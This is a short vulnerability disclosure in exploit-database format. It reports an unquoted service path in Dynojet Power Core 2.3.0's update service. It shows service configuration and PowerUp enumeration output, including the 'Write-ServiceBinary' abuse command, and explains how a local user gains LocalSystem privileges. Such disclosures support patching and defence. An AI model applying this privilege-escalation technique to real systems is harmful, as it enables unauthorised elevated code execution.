Dynojet Power Core version 2.3.0 suffers from an unquoted service path vulnerability.
# Exploit Title: Dynojet Power Core 2.3.0 - Unquoted Service Path
# Exploit Author: Pedro Sousa Rodrigues (https://www.0x90.zone/ / @Pedro_SEC_R)
# Version: 2.3.0 (Build 303)
# Date: 30.10.2021
# Vendor Homepage: https://www.dynojet.com/
# Software Link: https://docs.dynojet.com/Document/18762
# Tested on: Windows 10 Version 21H1 (OS Build 19043.1320)
SERVICE_NAME: DJ.UpdateService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program FilesDynojet Power CoreDJ.UpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DJ.UpdateService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
PS C:UsersDeveloper> Get-UnquotedService
ServiceName : DJ.UpdateService
Path : C:Program FilesDynojet Power CoreDJ.UpdateService.exe
ModifiablePath : @{ModifiablePath=C:; IdentityReference=NT AUTHORITYAuthenticated Users;
Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>
CanRestart : True
Name : DJ.UpdateService
ServiceName : DJ.UpdateService
Path : C:Program FilesDynojet Power CoreDJ.UpdateService.exe
ModifiablePath : @{ModifiablePath=C:; IdentityReference=NT AUTHORITYAuthenticated Users; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>
CanRestart : True
Name : DJ.UpdateService
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path (depending on the installation path). The service might be executed manually by any Authenticated user. If successful, the local user's code would execute with the elevated privileges of Local System.
